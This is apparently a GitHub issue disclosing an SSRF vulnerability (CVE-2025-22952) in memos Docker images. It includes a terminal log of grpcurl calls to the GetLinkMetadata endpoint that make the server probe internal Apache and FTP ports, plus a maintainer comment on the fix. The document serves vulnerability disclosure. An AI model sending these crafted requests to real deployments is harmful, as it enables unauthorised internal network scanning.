CVE-2025-22952 memos SSRF

[joe912693295]

Describe the bug

elestio/memos:latest and neosmemo/memos:latest both have SSRF vulnerability, which allowing attackers to access to intranet IP addresses and protocols. Despite efforts to limit access protocols to HTTP and HTTPS, attackers can still accessing other ports running on localhost. This vulnerability enables attackers to access any asset on the internal network, sniff web services on the internal network, scan hosts on the internal network, and potentially access weak internal endpoints. The vulnerability is due to insufficient validation of user-supplied URLs, which can be exploited to perform SSRF attacks.

Steps to reproduce

┌──(root㉿kali)-[~/Downloads]
└─# cat docker-compose.yaml
version: '3.3'
services:
memos:
image: 'elestio/memos:latest'
restart: always
ports:
- '172.17.0.1:5230:5230'
volumes:
- './memos/:/var/opt/memos'

┌──(root㉿kali)-[~/Downloads]
└─# docker-compose up -d
WARN[0000] /root/Downloads/docker-compose.yaml: the attribute version is obsolete, it will be ignored, please remove it to avoid potential confusion
[+] Running 2/2
✔ Network downloads_default Created 0.1s
✔ Container downloads-memos-1 Started 0.2s

┌──(root㉿kali)-[~/Downloads]
└─# curl --head 172.17.0.1:5230
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 1162
Content-Type: text/html; charset=utf-8
Date: Mon, 17 Feb 2025 06:18:20 GMT

┌──(root㉿kali)-[~/Downloads]
└─# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host noprefixroute
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:0d:08:46 brd ff:ff:ff:ff:ff:ff
inet 192.168.32.10/24 brd 192.168.32.255 scope global noprefixroute eth0
valid_lft forever preferred_lft forever
inet6 fd15:4ba5:5a2b:1008:87ce:957e:7a15:e7cb/64 scope global temporary dynamic
valid_lft 86375sec preferred_lft 14375sec
inet6 fd15:4ba5:5a2b:1008:20c:29ff:fe0d:846/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 86375sec preferred_lft 14375sec
inet6 fe80::20c:29ff:fe0d:846/64 scope link noprefixroute
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:d6:f1:dd:88 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
10: br-a984a394dce2: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
link/ether 02:42:a4:bc:23:14 brd ff:ff:ff:ff:ff:ff
inet 172.18.0.1/16 brd 172.18.255.255 scope global br-a984a394dce2
valid_lft forever preferred_lft forever
inet6 fe80::42:a4ff:febc:2314/64 scope link proto kernel_ll
valid_lft forever preferred_lft forever
12: veth27be711@if11: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br-a984a394dce2 state UP group default
link/ether 22:8e:89:24:39:2b brd ff:ff:ff:ff:ff:ff link-netnsid 0
inet6 fe80::208e:89ff:fe24:392b/64 scope link proto kernel_ll
valid_lft forever preferred_lft forever

┌──(root㉿kali)-[~/Downloads]
└─# systemctl status apache2
● apache2.service - The Apache HTTP Server
Loaded: loaded (/usr/lib/systemd/system/apache2.service; disabled; preset: disabled)
Active: active (running) since Mon 2025-02-17 14:12:53 HKT; 5min ago
Invocation: 0d09dfdcb0c248e6994cc9a9bc8d8ced
Docs: https://httpd.apache.org/docs/2.4/
Process: 30231 ExecStart=/usr/sbin/apachectl start (code=exited, status=0/SUCCESS)
Main PID: 30247 (apache2)
Tasks: 7 (limit: 9387)
Memory: 21M (peak: 21.2M)
CPU: 96ms
CGroup: /system.slice/apache2.service
├─30247 /usr/sbin/apache2 -k start
├─30249 /usr/sbin/apache2 -k start
├─30250 /usr/sbin/apache2 -k start
├─30251 /usr/sbin/apache2 -k start
├─30252 /usr/sbin/apache2 -k start
├─30253 /usr/sbin/apache2 -k start
└─30350 /usr/sbin/apache2 -k start

Feb 17 14:12:53 kali systemd[1]: Starting apache2.service - The Apache HTTP Server...
Feb 17 14:12:53 kali apachectl[30246]: AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1. Set the 'ServerName' d>
Feb 17 14:12:53 kali systemd[1]: Started apache2.service - The Apache HTTP Server.

┌──(root㉿kali)-[~/Downloads]
└─# systemctl status vsftpd
● vsftpd.service - vsftpd FTP server
Loaded: loaded (/usr/lib/systemd/system/vsftpd.service; disabled; preset: disabled)
Active: active (running) since Mon 2025-02-17 14:12:09 HKT; 6min ago
Invocation: 84be3dbceea84a53a68a404f7eb34a85
Process: 29770 ExecStartPre=/bin/mkdir -p /var/run/vsftpd/empty (code=exited, status=0/SUCCESS)
Main PID: 29772 (vsftpd)
Tasks: 1 (limit: 9387)
Memory: 1M (peak: 2M)
CPU: 31ms
CGroup: /system.slice/vsftpd.service
└─29772 /usr/sbin/vsftpd /etc/vsftpd.conf

Feb 17 14:12:09 kali systemd[1]: Starting vsftpd.service - vsftpd FTP server...
Feb 17 14:12:09 kali systemd[1]: Started vsftpd.service - vsftpd FTP server.

┌──(root㉿kali)-[~/Downloads]
└─# grpcurl -plaintext -d "{"link": "http://192.168.32.10:21/\"}" 172.17.0.1:5230 memos.api.v1.MarkdownService.GetLinkMetadata
ERROR:
Code: Unknown
Message: Get "http://192.168.32.10:21/": net/http: HTTP/1.x transport connection broken: malformed HTTP status code "(vsFTPd"

┌──(root㉿kali)-[~/Downloads]
└─# grpcurl -plaintext -d "{"link": "http://192.168.32.10:80/\"}" 172.17.0.1:5230 memos.api.v1.MarkdownService.GetLinkMetadata
{
"title": "Apache2 Debian Default Page: It works"
}

┌──(root㉿kali)-[~/Downloads]
└─# docker-compose down
WARN[0000] /root/Downloads/docker-compose.yaml: the attribute version is obsolete, it will be ignored, please remove it to avoid potential confusion
[+] Running 2/2
✔ Container downloads-memos-1 Removed 0.2s
✔ Network downloads_default Removed 0.3s

┌──(root㉿kali)-[~/Downloads]
└─# docker run -d --name memos -p 5230:5230 -v ~/.memos/:/var/opt/memos neosmemo/memos
Unable to find image 'neosmemo/memos:latest' locally
latest: Pulling from neosmemo/memos
Digest: sha256:4723d86e6797fd629f1f2ff7afd4e37e669df7318f00de31c7ff9acf1fe9db7f
Status: Downloaded newer image for neosmemo/memos:latest
e222cc3bc60be3e4746053f3475dcf25cc6cebfc0efad764d2238e1ee174bbc6

┌──(root㉿kali)-[~/Downloads]
└─# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
e222cc3bc60b neosmemo/memos "./entrypoint.sh ./m…" 21 seconds ago Up 20 seconds 0.0.0.0:5230->5230/tcp, :::5230->5230/tcp memos

┌──(root㉿kali)-[~/Downloads]
└─# docker inspect e22 | grep -i "ipaddress"
"SecondaryIPAddresses": null,
"IPAddress": "172.17.0.2",
"IPAddress": "172.17.0.2",

┌──(root㉿kali)-[~/Downloads]
└─# grpcurl -plaintext -d "{"link": "http://192.168.32.10/\"}" 172.17.0.2:5230 memos.api.v1.MarkdownService.GetLinkMetadata
{
"title": "Apache2 Debian Default Page: It works"
}

┌──(root㉿kali)-[~/Downloads]
└─# grpcurl -plaintext -d "{"link": "http://192.168.32.10:21/\"}" 172.17.0.2:5230 memos.api.v1.MarkdownService.GetLinkMetadata
ERROR:
Code: Unknown
Message: Get "http://192.168.32.10:21/": net/http: HTTP/1.x transport connection broken: malformed HTTP status code "(vsFTPd"

Dear dev please pay attention to "memos-main\plugin\httpgetter\html_meta.go" file where the http.Get(urlStr) within GetHTMLMeta function.

The version of Memos you're using

latest

Screenshots or additional context

No response

[CallMeMhz]

#4421 It doesn’t seem like a complete solution; it would be better if page preview could be done from the frontend.